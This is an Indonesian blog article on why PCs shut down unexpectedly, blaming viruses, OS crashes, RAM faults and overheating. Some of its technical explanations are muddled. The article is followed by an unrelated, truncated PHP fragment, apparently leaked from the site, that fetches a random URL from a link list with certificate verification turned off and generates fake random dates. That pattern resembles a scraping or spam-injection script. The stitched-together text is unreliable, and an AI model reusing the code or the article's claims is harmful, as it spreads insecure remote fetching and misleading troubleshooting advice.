Penyebab PC Sering Mati Tiba-Tiba

Penyebab PC Sering Mati Tiba-Tiba

Sangat menjengkelkan sekali ketika kita sedang berada di depan PC (laptop, notebook, netbook ataupun komputer) tiba-tiba saja mati tanpa ada perintah untuk mematikannya. Tentu hal ini terkadang membuat suasana menjadikan tidak mengenakan terlebih lagi jika kita sedang mengerjakan sesuatu yang penting saat itu. Ada beberapa penyebab sebenarnya mengapa PC sering tiba-tiba mati sendiri tanpa kita meng-klik shutdown. Mari langsung saja, kita bisa lihat dibawah ini beberapa penyebab PC sering mati tiba-tiba antara lain:

-          Virus

Virus sudah menjadi musuh terbesar bagi PC itu sendiri, walaupun terkadang didalam sebuah PC sudah terpasang anti-virus namun masih saja virus tersebut bisa masuk. Semakin banyak jenis virus yang ada dengan berbagai macam akibat yang dihasilkan nya semakin susah juga terkadang menangani nya. Terlebih lagi jika virus tersebut sudah menginfeksi bagian sistem core dari PC yang mana juga dibuat untuk mematikan sistem PC. Misalnya virus yang bisa mengakibatkan sistem mati salah satu bisa diambil dari software pemutar music yang terkenal yakni Winamp, jika virus tersebut sudah menjalarkan ke program winamp maka ketika Anda mencoba memainkan Winamp maka PC akan mati ataupun restart sendiri

-          Kerusakan Sistem Operasi

Terkadang jika didalam sebuah PC terdapat banyak sekali program yang harus dan wajib dijalankan akan membuat PC tersebut bekerja dengan lambat dan hal ini biasa nya PC selalu meminta untuk me-restart dan terkadang juga shutdown, dan hal ini juga menjadi salah faktor yang bisa membuat PC sering tiba-tiba mati karena sudah terjadi crash didalam sistem operasi nya tersebut.

-          Kerusakan Hardware

Tidak dipungkiri jika Hardware pun disini menjadi salah satu faktor yang cukup kuat yang bisa membuat PC sering tiba-tiba mati, terutama salah bagian yang sangat sensitif sekali yakni RAM. Ketika RAM gagal menjalankan fungsi nya maka akan terjadi limit kapasitas memory atau jika dikatakan dengan bahasa yang sederhana RAM sudah tidak mampu menampung lagi daya kerjanya sehingga PC pun akan mati sendiri.

-          Suhu Udara PC Terlalu Panas

Untuk hal ini biasanya jika Anda memakai PC tersebut dalam jangka waktu yang cukup lama tentu PC akan mengalami sedikit pembakaran suhu yang cukup besar sehingga nantinya akan menimbulkan PC mati sendiri karena mesin dan juga RAM sudah terlalu mengeluarkan banyak energy sehingga butuh men-refresh nya dengan shutdown. Namun bukan hanya suhu didalam PC itu sendiri tetapi juga suhu diluar jangan sampai berada di tempat panas ketika memakai PC.

Itulah beberapa penyebab PC sering mati tiba tiba yang mungkin sampai saat ini masih belum Anda ketahui, penyebab-penyebab yang telah dijelaskan diatas semoga dapat membantu Anda jika mengalami hal tersebut, solusi nya cukuplah mudah yakni dengan hanya sering melakukan maintenance karena itu sudah menjadi kewajiban bagi Anda yang ingin mempunyai PC yang selalu aman serta sehat.

Penyebab PC Sering Mati Tiba-Tiba

Penyebab PC Sering Mati Tiba-Tiba | admin | 4.5
html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>